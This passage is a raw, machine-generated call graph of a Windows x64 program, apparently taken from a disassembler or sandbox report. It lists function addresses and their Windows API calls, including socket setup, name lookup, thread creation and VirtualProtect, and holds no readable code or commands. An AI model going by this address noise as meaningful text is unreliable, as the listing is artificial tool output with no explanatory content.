62120->62148 62121->62108 62123->61954 62123->61955 62125 7ff654410174 62151 7ff654560750 RtlCaptureContext RtlUnwindEx abort 62125->62151 62136 7ff6543b57cf 62135->62136 62137 7ff6543b57d4 62135->62137 62159 7ff6543b57e0 50 API calls 62136->62159 62160 7ff6543b5820 50 API calls 62137->62160 62140 7ff6543b57d9 62142->62108 62143->62114 62144->62120 62145->62108 62147->62125 62149->62119 62150->62125 62152 7ff65456080b 62151->62152 62155 7ff654560815 62151->62155 62157 7ff654560710 RaiseException 62152->62157 62156 7ff654560810 abort 62155->62156 62158 7ff6545603a0 RaiseException 62155->62158 62156->62155 62157->62156 62158->62155 62160->62140 62162 7ff6543b971a 62161->62162 62163 7ff6543b9619 62161->62163 62162->62163 62188 7ff6543b9840 62162->62188 62163->61996 62171 7ff6544f2f60 HeapFree 62163->62171 62165->61975 62166->61987 62167->61978 62191 7ff6543bc4e0 50 API calls 62168->62191 62170 7ff6543bc4de 62171->61996 62172->61977 62173->61978 62174->61986 62175->61984 62176->62002 62177->62002 62178->62007 62179->62000 62192 7ff654519b40 62180->62192 62182 7ff6543b86c4 62182->62012 62183->62016 62185 7ff6543bc8cf 62184->62185 62333 7ff6543bc790 50 API calls 62184->62333 62187->62023 62189 7ff6543b8690 50 API calls 62188->62189 62190 7ff6543b987c 62189->62190 62190->62162 62191->62170 62193 7ff654519b5f 62192->62193 62194 7ff654519b53 62192->62194 62198 7ff654519b80 62193->62198 62201 7ff6543bc4a0 62194->62201 62204 7ff654519b90 62198->62204 62200 7ff654519b8f 62332 7ff6543b93d0 50 API calls 62201->62332 62206 7ff654519bac 62204->62206 62205 7ff654519c02 62214 7ff654519c80 62205->62214 62206->62205 62208 7ff654519c80 49 API calls 62206->62208 62208->62205 62209 7ff654519c40 62210 7ff654519c56 HeapFree 62209->62210 62211 7ff654560750 6 API calls 62209->62211 62212 7ff654560750 6 API calls 62210->62212 62211->62210 62213 7ff654519c76 62212->62213 62215 7ff65451a178 62214->62215 62216 7ff654519cbf 62214->62216 62310 7ff6544f2ec0 62215->62310 62259 7ff6544f56b0 62216->62259 62219 7ff6543bb190 49 API calls 62236 7ff654519cca 62219->62236 62221 7ff65451a1f1 62223 7ff6544f2ec0 49 API calls 62221->62223 62315 7ff6544f2f60 HeapFree 62221->62315 62223->62221 62224 7ff6544f56b0 49 API calls 62224->62236 62226 7ff654519f79 62228 7ff6543b95d0 49 API calls 62226->62228 62231 7ff654519fce 62228->62231 62230 7ff654514610 49 API calls 62230->62236 62237 7ff654519fda 62231->62237 62316 7ff6544f2f60 HeapFree 62231->62316 62234 7ff654519220 49 API calls 62234->62236 62236->62219 62236->62221 62236->62224 62236->62226 62236->62230 62236->62234 62241 7ff65451a117 WakeByAddressSingle 62236->62241 62242 7ff654514780 HeapFree 62236->62242 62246 7ff6544f97e0 49 API calls 62236->62246 62279 7ff65451a4a0 50 API calls 62236->62279 62280 7ff654519160 50 API calls 62236->62280 62281 7ff654515c90 50 API calls 62236->62281 62282 7ff6544f4070 62236->62282 62307 7ff6544f4270 HeapFree 62236->62307 62308 7ff6544f41e0 50 API calls 62236->62308 62309 7ff6544f9730 WaitOnAddress GetLastError 62236->62309 62238 7ff65451a364 62237->62238 62317 7ff654514780 HeapFree 62237->62317 62244 7ff65451a39e 62238->62244 62318 7ff6544f4270 HeapFree 62238->62318 62241->62236 62242->62236 62243 7ff65451a3ba 62247 7ff65451a401 62243->62247 62320 7ff654519160 50 API calls 62243->62320 62244->62243 62319 7ff654514780 HeapFree 62244->62319 62246->62236 62250 7ff654560750 6 API calls 62247->62250 62251 7ff65451a409 62250->62251 62252 7ff6543bc8c0 49 API calls 62251->62252 62253 7ff65451a40e 62252->62253 62254 7ff6545160d0 HeapAlloc 62253->62254 62255 7ff65451a436 62254->62255 62256 7ff65451a43b 62255->62256 62321 7ff6543b5820 50 API calls 62255->62321 62256->62209 62258 7ff65451a460 62258->62209 62260 7ff6544f56c5 TlsGetValue 62259->62260 62261 7ff6544f56e2 62259->62261 62264 7ff6544f56d2 62260->62264 62322 7ff6544f4330 50 API calls 62261->62322 62263 7ff6544f56d9 62263->62236 62264->62263 62265 7ff6544f5705 TlsGetValue 62264->62265 62266 7ff6544f5780 62264->62266 62265->62263 62268 7ff6544f5716 62265->62268 62323 7ff6544f4330 50 API calls 62266->62323 62268->62263 62270 7ff6545160d0 HeapAlloc 62268->62270 62269 7ff6544f578c TlsGetValue 62269->62263 62269->62268 62271 7ff6544f572e 62270->62271 62272 7ff6544f57bc 62271->62272 62273 7ff6544f5737 62271->62273 62325 7ff6543b5820 50 API calls 62272->62325 62278 7ff6544f5753 TlsSetValue 62273->62278 62324 7ff6544f4330 50 API calls 62273->62324 62276 7ff6544f57cb 62278->62263 62279->62236 62280->62236 62281->62236 62283 7ff6544f4085 TlsGetValue 62282->62283 62284 7ff6544f40a2 62282->62284 62285 7ff6544f4092 62283->62285 62326 7ff6544f4330 50 API calls 62284->62326 62287 7ff6544f4171 62285->62287 62288 7ff6544f40c9 TlsGetValue 62285->62288 62304 7ff6544f4099 62285->62304 62328 7ff6544f4330 50 API calls 62287->62328 62290 7ff6544f40da 62288->62290 62288->62304 62289 7ff6544f40ae TlsGetValue 62289->62285 62293 7ff6544f4137 62290->62293 62294 7ff6545160d0 HeapAlloc 62290->62294 62292 7ff6544f417d TlsGetValue 62292->62290 62292->62304 62293->62304 62327 7ff6544f4270 HeapFree 62293->62327 62295 7ff6544f4105 62294->62295 62296 7ff6544f41b0 62295->62296 62297 7ff6544f410e 62295->62297 62330 7ff6543b5820 50 API calls 62296->62330 62298 7ff6544f4127 TlsSetValue 62297->62298 62329 7ff6544f4330 50 API calls 62297->62329 62298->62293 62303 7ff6544f41bf 62305 7ff654560750 6 API calls 62303->62305 62304->62236 62306 7ff6544f41d5 62305->62306 62307->62236 62308->62236 62309->62236 62311 7ff6543b95d0 50 API calls 62310->62311 62312 7ff6544f2eef 62311->62312 62313 7ff6544f2ef7 62312->62313 62331 7ff6544f2f60 HeapFree 62312->62331 62313->62221 62315->62221 62316->62237 62317->62238 62318->62244 62319->62243 62320->62247 62321->62258 62322->62264 62323->62269 62324->62278 62325->62276 62326->62289 62327->62304 62328->62292 62329->62298 62330->62303 62331->62313 62333->62185 62334->62039 62335->62043 62336->62050 62337->62054 62339 7ff6543914d0 62342 7ff654391180 62339->62342 62341 7ff6543914e6 62343 7ff654391450 GetStartupInfoA 62342->62343 62344 7ff6543911b2 62342->62344 62346 7ff6543913c2 62343->62346 62345 7ff6543911e1 Sleep 62344->62345 62347 7ff6543911f6 62344->62347 62345->62344 62346->62341 62348 7ff65439141c _initterm 62347->62348 62349 7ff654391229 62347->62349 62352 7ff6543913ae 62347->62352 62348->62349 62361 7ff654561a70 62349->62361 62351 7ff654391251 SetUnhandledExceptionFilter 62358 7ff654391274 62351->62358 62352->62346 62353 7ff654391180 135 API calls 62352->62353 62354 7ff6543914c6 62353->62354 62354->62341 62355 7ff65439130e malloc 62355->62352 62356 7ff654391339 62355->62356 62357 7ff654391340 strlen malloc memcpy 62356->62357 62357->62357 62359 7ff654391372 62357->62359 62358->62355 62383 7ff6543b52d0 62359->62383 62363 7ff654561aa8 62361->62363 62382 7ff654561a91 62361->62382 62362 7ff654561d80 62365 7ff654561d89 62362->62365 62362->62382 62363->62362 62364 7ff654561c9e 62363->62364 62373 7ff654561b22 62363->62373 62363->62382 62368 7ff654561dad 62364->62368 62372 7ff654561cb9 62364->62372 62365->62368 62395 7ff654561900 8 API calls 62365->62395 62367 7ff654561dbe 62397 7ff654561890 8 API calls 62367->62397 62396 7ff654561890 8 API calls 62368->62396 62371 7ff654561dca 62371->62351 62375 7ff654561cca 62372->62375 62373->62364 62373->62367 62373->62368 62373->62372 62373->62375 62377 7ff654561b80 62373->62377 62373->62382 62374 7ff654561900 8 API calls 62374->62375 62375->62372 62375->62374 62394 7ff654561890 8 API calls 62375->62394 62377->62373 62377->62375 62378 7ff654561900 8 API calls 62377->62378 62379 7ff654561c28 62377->62379 62381 7ff654561c30 62377->62381 62378->62377 62379->62381 62380 7ff654561c62 VirtualProtect 62380->62381 62381->62380 62381->62382 62382->62351 62384 7ff6543b52e2 62383->62384 62385 7ff6543b5305 SetThreadDescription 62384->62385 62398 7ff6544f2910 62385->62398 62392 7ff6543b537e 62392->62352 62394->62375 62395->62365 62396->62367 62397->62371 62399 7ff6545160d0 HeapAlloc 62398->62399 62400 7ff6544f2933 62399->62400 62401 7ff6544f298e 62400->62401 62402 7ff6544f2938 62400->62402 62461 7ff6543b5820 50 API calls 62401->62461 62405 7ff6543b532a 62402->62405 62460 7ff6544f5e10 50 API calls 62402->62460 62404 7ff6544f298c 62407 7ff654560750 6 API calls 62404->62407 62411 7ff6544f29d0 62405->62411 62408 7ff6544f29b2 62407->62408 62409 7ff654560750 6 API calls 62408->62409 62410 7ff6544f29cb 62409->62410 62412 7ff6544f4070 50 API calls 62411->62412 62413 7ff6544f29e8 62412->62413 62414 7ff6544f29ed 62413->62414 62416 7ff6544f2a0d 62413->62416 62462 7ff6544f4270 HeapFree 62413->62462 62415 7ff6543b5332 62414->62415 62419 7ff6543bb190 50 API calls 62414->62419 62425 7ff6543919c0 62415->62425 62418 7ff6543bb190 50 API calls 62416->62418 62418->62414 62420 7ff6544f2a64 62419->62420 62421 7ff6544f2a73 62420->62421 62463 7ff6544f4270 HeapFree 62420->62463 62423 7ff654560750 6 API calls 62421->62423 62424 7ff6544f2a92 62423->62424 62464 7ff6543a8ee4 62425->62464 62475 7ff6543a8dea GetSystemInfo 62425->62475 62482 7ff6543aa302 62425->62482 62426 7ff6543919c6 62426->62392 62430 7ff6544f2b90 62426->62430 62457 7ff6544f2bcc 62430->62457 62431 7ff6544f2de3 62435 7ff6543b8690 50 API calls 62431->62435 62432 7ff6544f2d74 62665 7ff654515610 62432->62665 62433 7ff6544f2d9f 62433->62392 62434 7ff6544f2c0f 62712 7ff6543b93d0 50 API calls 62434->62712 62435->62434 62436 7ff6544f2d93 62711 7ff6544f3fc0 51 API calls 62436->62711 62440 7ff6544f2db1 62442 7ff6543bc4c0 50 API calls 62440->62442 62446 7ff6544f2dc9 62442->62446 62443 7ff6544f2ca7 62448 7ff6543bc8c0 50 API calls 62443->62448 62445 7ff6544f41e0 50 API calls 62445->62457 62449 7ff6543bc4c0 50 API calls 62446->62449 62451 7ff6544f2e52 62448->62451 62449->62443 62454 7ff6544f4070 50 API calls 62454->62457 62455 7ff6544f4270 HeapFree 62455->62457 62457->62431 62457->62432 62457->62433 62457->62434 62457->62440 62457->62443 62457->62445 62457->62446 62457->62454 62457->62455 62458 7ff6544f2d00 WaitOnAddress 62457->62458 62458->62457 62458->62458 62461->62404 62462->62416 62463->62421 62465 7ff6543a8ec1 62464->62465 62468 7ff6543a8f0e 62464->62468 62466 7ff6543b8690 50 API calls 62465->62466 62467 7ff6543a9266 62466->62467 62467->62426 62468->62465 62469 7ff6543a8de9 GetSystemInfo 62468->62469 62470 7ff6543a943a 62468->62470 62471 7ff6543a8e73 62469->62471 62490 7ff65452b460 62469->62490 62473 7ff6543b8690 50 API calls 62470->62473 62474 7ff6543bb190 50 API calls 62471->62474 62473->62465 62474->62465 62476 7ff65452b460 64 API calls 62475->62476 62477 7ff6543a8e73 62476->62477 62478 7ff6543bb190 50 API calls 62477->62478 62479 7ff6543a8ec1 62478->62479 62480 7ff6543b8690 50 API calls 62479->62480 62481 7ff6543a9266 62480->62481 62481->62426 62483 7ff6543aa30c 62482->62483 62484 7ff6545160d0 HeapAlloc 62483->62484 62485 7ff6543aa3a3 62484->62485 62557 7ff65451da00 62485->62557 62487 7ff6543aa459 62488 7ff6543b8690 50 API calls 62487->62488 62489 7ff6543aa583 62488->62489 62489->62489 62491 7ff65452b70a 62490->62491 62492 7ff65452b483 CreateIoCompletionPort 62490->62492 62495 7ff6545160d0 HeapAlloc 62491->62495 62493 7ff65452b762 GetLastError 62492->62493 62494 7ff65452b4a3 62492->62494 62500 7ff65452b844 62493->62500 62496 7ff6545160d0 HeapAlloc 62494->62496 62497 7ff65452b71d 62495->62497 62499 7ff65452b4b9 62496->62499 62498 7ff65452badc 62497->62498 62539 7ff65452b726 62497->62539 62553 7ff6543b5820 50 API calls 62498->62553 62502 7ff65452baa6 62499->62502 62503 7ff65452b4c2 62499->62503 62500->62471 62501 7ff65452bb1f HeapFree 62506 7ff65452bb6f 62501->62506 62551 7ff6543b5820 50 API calls 62502->62551 62503->62501 62510 7ff6545160d0 HeapAlloc 62503->62510 62517 7ff65452bb85 62506->62517 62555 7ff6543eea80 53 API calls 62506->62555 62507 7ff65452baeb 62508 7ff6543b57c0 50 API calls 62507->62508 62509 7ff65452bab5 62508->62509 62509->62501 62511 7ff65452b561 62510->62511 62515 7ff65452bab7 62511->62515 62527 7ff65452b56a 62511->62527 62514 7ff65452bbb3 62518 7ff654560750 6 API calls 62514->62518 62552 7ff6543b5820 50 API calls 62515->62552 62516 7ff65452b8e2 62520 7ff6545160d0 HeapAlloc 62516->62520 62517->62514 62556 7ff6543eea80 53 API calls 62517->62556 62522 7ff65452bbd7 62518->62522 62523 7ff65452b8fa 62520->62523 62525 7ff6543bc8c0 50 API calls 62522->62525 62523->62507 62524 7ff65452b903 memset memset memset memset memset 62523->62524 62524->62500 62528 7ff65452bbdc 62525->62528 62526 7ff65452b700 62532 7ff6545160d0 HeapAlloc 62526->62532 62527->62501 62527->62526 62529 7ff65452bafc 62527->62529 62530 7ff65452b5ec 62527->62530 62533 7ff6543bc8c0 50 API calls 62528->62533 62554 7ff6543b57e0 50 API calls 62529->62554 62534 7ff6545160d0 HeapAlloc 62530->62534 62536 7ff65452b7bd 62532->62536 62537 7ff65452bbe1 62533->62537 62535 7ff65452b604 62534->62535 62538 7ff65452bb03 62535->62538 62546 7ff65452b60d 62535->62546 62536->62539 62540 7ff65452bacb 62536->62540 62541 7ff6543bc8c0 50 API calls 62537->62541 62542 7ff6543b57c0 50 API calls 62538->62542 62539->62500 62539->62501 62550 7ff6544f6600 53 API calls 62539->62550 62543 7ff6543b57c0 50 API calls 62540->62543 62544 7ff65452bbe6 62541->62544 62542->62509 62543->62509 62545 7ff6545160d0 HeapAlloc 62547 7ff65452b6f7 62545->62547 62546->62545 62546->62546 62547->62526 62548 7ff65452bb12 62547->62548 62549 7ff6543b57c0 50 API calls 62548->62549 62549->62501 62550->62516 62551->62509 62552->62509 62553->62507 62555->62517 62556->62514 62558 7ff65451da2b 62557->62558 62559 7ff65451da7d 62558->62559 62560 7ff65451da3c 62558->62560 62561 7ff65451da93 62559->62561 62644 7ff65451e7f0 54 API calls 62559->62644 62567 7ff65451da47 62560->62567 62657 7ff6543b93d0 50 API calls 62560->62657 62564 7ff65451db1b 62561->62564 62565 7ff65451dadb 62561->62565 62564->62567 62568 7ff65451e2a5 62564->62568 62577 7ff65451db3f 62564->62577 62565->62567 62655 7ff6543bf520 50 API calls 62565->62655 62566 7ff65451dbd0 62570 7ff65451e5a8 62566->62570 62571 7ff65451e3ce HeapFree 62566->62571 62567->62487 62658 7ff6543b93d0 50 API calls 62568->62658 62664 7ff65451e9a0 55 API calls 62570->62664 62571->62570 62574 7ff654560750 6 API calls 62576 7ff65451e619 62574->62576 62575 7ff65451e5b5 62575->62574 62579 7ff6543bc8c0 50 API calls 62576->62579 62577->62566 62578 7ff65451dc2e 62577->62578 62645 7ff6545129a0 70 API calls 62577->62645 62580 7ff65451dd05 62578->62580 62585 7ff65451dd1a 62578->62585 62582 7ff65451e61e 62579->62582 62583 7ff6544f2910 50 API calls 62580->62583 62584 7ff65451dd18 62583->62584 62584->62566 62591 7ff6545160d0 HeapAlloc 62584->62591 62586 7ff65451e378 62585->62586 62587 7ff65451dd63 62585->62587 62589 7ff6543bb190 50 API calls 62586->62589 62646 7ff6543b59d0 54 API calls 62587->62646 62589->62566 62590 7ff65451dc4d 62590->62578 62598 7ff65451dcd0 HeapFree 62590->62598 62593 7ff65451dde1 62591->62593 62592 7ff65451dd7c 62594 7ff6544f2910 50 API calls 62592->62594 62595 7ff65451ddea 62593->62595 62596 7ff65451e2c2 62593->62596 62594->62584 62595->62566 62599 7ff65451de37 62595->62599 62647 7ff654514610 50 API calls 62595->62647 62659 7ff6543b5820 50 API calls 62596->62659 62598->62578 62599->62566 62600 7ff65451de91 62599->62600 62648 7ff654514610 50 API calls 62599->62648 62603 7ff65451dee1 62600->62603 62606 7ff65451e36d 62600->62606 62607 7ff6545160d0 HeapAlloc 62603->62607 62604 7ff65451de2e 62604->62599 62608 7ff65451e342 62604->62608 62605 7ff65451de72 62611 7ff65451de7b 62605->62611 62612 7ff65451e303 62605->62612 62663 7ff6544f6570 50 API calls 62606->62663 62613 7ff65451def4 62607->62613 62609 7ff6543bb190 50 API calls 62608->62609 62609->62566 62611->62600 62649 7ff65451e8d0 HeapFree 62611->62649 62614 7ff65451e317 62612->62614 62662 7ff654514780 HeapFree 62612->62662 62615 7ff65451e2db 62613->62615 62616 7ff65451defd 62613->62616 62618 7ff6543bb190 50 API calls 62614->62618 62660 7ff6543b5820 50 API calls 62615->62660 62619 7ff6545160d0 HeapAlloc 62616->62619 62618->62566 62620 7ff65451df49 62619->62620 62623 7ff65451e2ef 62620->62623 62624 7ff65451df52 CreateThread 62620->62624 62661 7ff6543b5820 50 API calls 62623->62661 62625 7ff65451df91 62624->62625 62631 7ff65451e10f 62624->62631 62627 7ff65451e277 62625->62627 62630 7ff65451dfb8 62625->62630 62656 7ff6543bf520 50 API calls 62627->62656 62629 7ff65451e143 HeapFree GetLastError 62633 7ff65451e16a 62629->62633 62634 7ff65451e15f 62629->62634 62639 7ff65451dff4 62630->62639 62650 7ff65451ebb0 53 API calls 62630->62650 62631->62629 62632 7ff65451e132 HeapFree 62631->62632 62632->62629 62638 7ff65451e186 62633->62638 62653 7ff65441c470 HeapFree 62633->62653 62652 7ff65451c250 HeapFree HeapFree WakeByAddressSingle 62634->62652 62638->62567 62654 7ff65451b3e0 HeapFree 62638->62654 62639->62567 62640 7ff65451e0fd 62639->62640 62651 7ff65451c0f0 HeapFree CloseHandle 62640->62651 62643 7ff65451e10a 62643->62567 62644->62561 62645->62590 62646->62592 62647->62604 62648->62605 62649->62600 62650->62639 62651->62643 62652->62633 62653->62638 62654->62567 62659->62566 62660->62566 62661->62566 62662->62614 62664->62575 62666 7ff654515833 62665->62666 62667 7ff654515635 62665->62667 62668 7ff6543bc4a0 50 API calls 62666->62668 62669 7ff65451563b 62667->62669 62670 7ff65451583f 62667->62670 62668->62670 62671 7ff6545160d0 HeapAlloc 62669->62671 62717 7ff6543b57e0 50 API calls 62670->62717 62673 7ff654515658 62671->62673 62674 7ff654515844 62673->62674 62675 7ff654515661 memcpy 62673->62675 62676 7ff6543b57c0 50 API calls 62674->62676 62680 7ff654515678 62675->62680 62677 7ff654515851 62676->62677 62678 7ff6545158c3 62677->62678 62679 7ff654515884 memset WSAStartup 62677->62679 62684 7ff6543bc4a0 50 API calls 62678->62684 62682 7ff6545158ae 62679->62682 62683 7ff6545158cf 62679->62683 62685 7ff6545157b5 62680->62685 62716 7ff6543b59d0 54 API calls 62680->62716 62682->62436 62713 7ff6544f44d0 62683->62713 62684->62683 62689 7ff654515821 62685->62689 62693 7ff654515810 HeapFree 62685->62693 62686 7ff654515764 getaddrinfo 62686->62685 62688 7ff6545157a1 WSAGetLastError 62686->62688 62688->62685 62689->62436 62690 7ff6545158fb 62691 7ff654515924 62690->62691 62692 7ff6543bc4a0 50 API calls 62690->62692 62694 7ff6544f44d0 50 API calls 62691->62694 62696 7ff65451594e 62691->62696 62692->62691 62693->62689 62695 7ff65451599b 62694->62695 62697 7ff6543bbfd0 51 API calls 62695->62697 62696->62436 62698 7ff6545159c7 62697->62698 62699 7ff654515a40 62698->62699 62703 7ff6545159ce 62698->62703 62700 7ff6545160d0 HeapAlloc 62699->62700 62701 7ff654515a53 62700->62701 62704 7ff654515a5c 62701->62704 62705 7ff6543b5820 50 API calls 62701->62705 62702 7ff6543bdf50 50 API calls 62702->62703 62703->62702 62703->62704 62707 7ff654515a0b 62703->62707 62704->62436 62706 7ff654515b77 62705->62706 62707->62704 62708 7ff654514ec0 65 API calls 62707->62708 62709 7ff654515b3c 62708->62709 62709->62704 62710 7ff654515100 57 API calls 62709->62710 62710->62704 62711->62433 62718 7ff6543b9410 62713->62718 62716->62686 62719 7ff6543b946e 62718->62719 62720 7ff6543b94d3 62718->62720 62722 7ff6543b8690 50 API calls 62719->62722 62721 7ff6543b8690 50 API calls 62720->62721 62723 7ff6543b9565 62721->62723 62722->62720 62724 7ff6544f32c0 62725 7ff6544f32da 62724->62725 62726 7ff6544f3311 62724->62726 62725->62726 62727 7ff6544f332f 62725->62727 62728 7ff6544f32fb GetLastError 62725->62728 62729 7ff6544f3405 62727->62729 62730 7ff6544f334a 62727->62730 62728->62726 62735 7ff6544f344d WaitForSingleObject 62729->62735 62736 7ff6544f3468 62729->62736 62731 7ff6544f3357 62730->62731 62738 7ff6544f3477 62730->62738 62732 7ff6544f3535 62731->62732 62733 7ff6544f3360 62731->62733 62734 7ff6543b8690 50 API calls 62732->62734 62733->62726 62744 7ff6544f35a1 62733->62744 62748 7ff6544f33a6 62733->62748 62739 7ff6544f3567 62734->62739 62735->62736 62735->62739 62736->62726 62740 7ff6544f34de RtlNtStatusToDosError 62736->62740 62737 7ff6544f34c4 62781 7ff6544f3670 62737->62781 62738->62726 62738->62737 62742 7ff6544f35cd 62738->62742 62743 7ff6544f34ad 62738->62743 62741 7ff6544f2ec0 50 API calls 62739->62741 62740->62737 62741->62744 62808 7ff6543b9060 50 API calls 62742->62808 62743->62737 62749 7ff6544f35e2 62743->62749 62807 7ff6543b9060 50 API calls 62744->62807 62748->62726 62750 7ff6544f3611 62748->62750 62751 7ff6544f33d6 62748->62751 62752 7ff6543bb190 50 API calls 62749->62752 62753 7ff6544f3900 50 API calls 62750->62753 62754 7ff6544f3670 55 API calls 62751->62754 62752->62750 62755 7ff6544f33e1 62753->62755 62754->62755 62755->62726 62804 7ff6544f3900 62755->62804 62758 7ff654560750 6 API calls 62760 7ff6544f3662 62758->62760 62759 7ff6544f36dc MultiByteToWideChar 62761 7ff6544f370a 62759->62761 62762 7ff6544f387b 62759->62762 62760->62759 62766 7ff6544f38e2 62760->62766 62764 7ff6544f38bc 62761->62764 62765 7ff6544f3718 WriteConsoleW 62761->62765 62763 7ff6543b8690 50 API calls 62762->62763 62763->62764 62811 7ff6543b9060 50 API calls 62764->62811 62769 7ff6544f383e GetLastError 62765->62769 62770 7ff6544f3749 62765->62770 62813 7ff6543bd420 50 API calls 62766->62813 62779 7ff6544f37e0 62769->62779 62774 7ff6544f375e 62770->62774 62775 7ff6544f3869 62770->62775 62770->62779 62771 7ff6544f37d7 62771->62779 62812 7ff6543b9060 50 API calls 62771->62812 62774->62771 62777 7ff6544f3772 WriteConsoleW 62774->62777 62810 7ff6543b8700 50 API calls 62775->62810 62777->62771 62778 7ff6544f37ac GetLastError 62777->62778 62809 7ff6544f2f60 HeapFree 62778->62809 62783 7ff6544f3680 62781->62783 62782 7ff6544f36dc MultiByteToWideChar 62784 7ff6544f370a 62782->62784 62785 7ff6544f387b 62782->62785 62783->62782 62789 7ff6544f38e2 62783->62789 62787 7ff6544f38bc 62784->62787 62788 7ff6544f3718 WriteConsoleW 62784->62788 62786 7ff6543b8690 50 API calls 62785->62786 62786->62787 62816 7ff6543b9060 50 API calls 62787->62816 62792 7ff6544f383e GetLastError 62788->62792 62793 7ff6544f3749 62788->62793 62818 7ff6543bd420 50 API calls 62789->62818 62803 7ff6544f37e0 62792->62803 62796 7ff6544f375e 62793->62796 62797 7ff6544f3869 62793->62797 62793->62803 62799 7ff6544f3772 WriteConsoleW 62796->62799 62800 7ff6544f37d7 62796->62800 62815 7ff6543b8700 50 API calls 62797->62815 62799->62800 62801 7ff6544f37ac GetLastError 62799->62801 62800->62803 62817 7ff6543b9060 50 API calls 62800->62817 62814 7ff6544f2f60 HeapFree 62801->62814 62803->62726 62805 7ff6543b9410 50 API calls 62804->62805 62806 7ff6544f364f CloseHandle 62805->62806 62806->62758 62809->62771 62810->62762 62814->62800 62815->62785 62819 7ff6544076a0 62820 7ff6544076bf 62819->62820 62821 7ff6544077e9 62819->62821 62846 7ff6545159a0 71 API calls 62820->62846 62822 7ff6543bc4a0 50 API calls 62821->62822 62824 7ff6544077f5 62822->62824 62827 7ff654407805 HeapFree 62824->62827 62828 7ff654407816 62824->62828 62825 7ff6544076d6 62826 7ff65440778a 62825->62826 62834 7ff654407772 62825->62834 62840 7ff6544077bc 62825->62840 62847 7ff65451a980 62825->62847 62863 7ff6544f2680 62825->62863 62829 7ff6544f2680 HeapFree 62826->62829 62827->62828 62831 7ff654407823 62828->62831 62832 7ff6544f2680 HeapFree 62828->62832 62830 7ff6544077a0 62829->62830 62833 7ff654560750 6 API calls 62831->62833 62832->62831 62836 7ff65440782b 62833->62836 62834->62826 62835 7ff654407779 HeapFree 62834->62835 62835->62826 62838 7ff6543bc8c0 50 API calls 62836->62838 62839 7ff654407830 62838->62839 62841 7ff6544077d2 62840->62841 62842 7ff6544077c1 HeapFree 62840->62842 62843 7ff6544077df closesocket 62841->62843 62845 7ff6544f2680 HeapFree 62841->62845 62842->62841 62843->62830 62845->62843 62846->62825 62848 7ff65451a99d 62847->62848 62849 7ff65451aaca 62847->62849 62850 7ff65451ab0f 62848->62850 62851 7ff65451a9ae 62848->62851 62849->62825 62867 7ff6545155a0 62850->62867 62854 7ff65451aa1a WSAGetLastError 62851->62854 62855 7ff65451a9ed bind 62851->62855 62853 7ff65451ab17 62856 7ff65451aa26 62854->62856 62857 7ff65451aa33 WSASocketW 62854->62857 62855->62849 62862 7ff65451aad1 WSAGetLastError 62855->62862 62856->62849 62856->62857 62858 7ff65451aaed WSAGetLastError 62857->62858 62859 7ff65451aa5f SetHandleInformation 62857->62859 62858->62849 62859->62855 62861 7ff65451aa7a GetLastError closesocket 62859->62861 62861->62849 62862->62849 62864 7ff6544f2698 62863->62864 62865 7ff6544f269d 62863->62865 62864->62865 62866 7ff6544f26cb HeapFree 62864->62866 62865->62825 62866->62865 62868 7ff6545155b7 62867->62868 62869 7ff6545155bd 62867->62869 62868->62853 62870 7ff6544f2b90 71 API calls 62869->62870 62871 7ff6545155fd 62870->62871 62871->62853 62872 7ff654403640 62876 7ff65440366e 62872->62876 62873 7ff654403a01 63085 7ff6543bf520 50 API calls 62873->63085 62875 7ff6544037a7 62877 7ff6544037c4 62875->62877 62878 7ff654403b28 62875->62878 62891 7ff654403750 62875->62891 62876->62873 62876->62875 62881 7ff654403737 62876->62881 62876->62891 62880 7ff6545160d0 HeapAlloc 62877->62880 63088 7ff6543b57e0 50 API calls 62878->63088 62883 7ff6544037db 62880->62883 63083 7ff654402310 57 API calls 62881->63083 62882 7ff654403b2d 62884 7ff6543b57c0 50 API calls 62882->62884 62883->62882 62885 7ff6544037e4 memcpy 62883->62885 62886 7ff654403b3a 62884->62886 62885->62891 62892 7ff654560750 6 API calls 62886->62892 62888 7ff654403960 62889 7ff654403ae3 62888->62889 62890 7ff6544039cc 62888->62890 62888->62891 63086 7ff654403290 50 API calls 62889->63086 62893 7ff6544039de 62890->62893 62894 7ff654403af3 62890->62894 62891->62891 62895 7ff654403b52 62892->62895 63084 7ff654402be0 52 API calls 62893->63084 63087 7ff654403310 51 API calls 62894->63087 62938 7ff65440408d 62895->62938 63014 7ff654404240 62895->63014 62901 7ff65440413c 63099 7ff6543b9060 50 API calls 62901->63099 62903 7ff654403c36 GetQueuedCompletionStatusEx 62906 7ff654403c64 62903->62906 62907 7ff654403f56 GetLastError 62903->62907 62904 7ff65440414e 62905 7ff6543b8690 50 API calls 62904->62905 62908 7ff654404185 62905->62908 62906->62901 62913 7ff654403c8e 62906->62913 63093 7ff6544f9730 WaitOnAddress GetLastError 62906->63093 62909 7ff654403f79 62907->62909 62916 7ff654403b96 62907->62916 62911 7ff654404199 62908->62911 63100 7ff65441c880 52 API calls 62908->63100 62912 7ff6544f2680 HeapFree 62909->62912 63079 7ff654405d90 62911->63079 62912->62916 62917 7ff654403ca1 62913->62917 63094 7ff6544f97e0 50 API calls 62913->63094 62919 7ff654404052 62917->62919 62956 7ff654403cb5 62917->62956 62922 7ff6543bb190 50 API calls 62919->62922 62921 7ff654403f54 63092 7ff654404b30 51 API calls 62921->63092 62922->62938 62924 7ff654404216 62926 7ff654405d90 50 API calls 62924->62926 62928 7ff654404227 62926->62928 62932 7ff654560750 6 API calls 62928->62932 62929 7ff654403f9c 62934 7ff654403fb3 62929->62934 63095 7ff6544f97e0 50 API calls 62929->63095 62930 7ff65452c250 53 API calls 62930->62956 62931 7ff654403d83 63096 7ff6543bf520 50 API calls 62931->63096 62937 7ff65440422f 62932->62937 62934->62916 62936 7ff654403fbf WakeByAddressSingle 62934->62936 62935 7ff654403d4d 62942 7ff6543bb190 50 API calls 62935->62942 62936->62916 62940 7ff6543bc8c0 50 API calls 62937->62940 63098 7ff6543b93d0 50 API calls 62938->63098 62943 7ff654404234 62940->62943 62942->62938 62945 7ff654404270 62943->62945 63111 7ff6544f9730 WaitOnAddress GetLastError 62943->63111 62944 7ff654403ece WakeByAddressSingle 62944->62956 62947 7ff654404283 62945->62947 63112 7ff6544f97e0 50 API calls 62945->63112 62950 7ff65440485a 62947->62950 62966 7ff65440429c 62947->62966 62948 7ff6544f97e0 50 API calls 62948->62956 62953 7ff6543bb190 50 API calls 62950->62953 62951 7ff6544040dc 63097 7ff6543bf520 50 API calls 62951->63097 62958 7ff654404898 62953->62958 62956->62921 62956->62930 62956->62931 62956->62935 62956->62938 62956->62944 62956->62948 62956->62951 63089 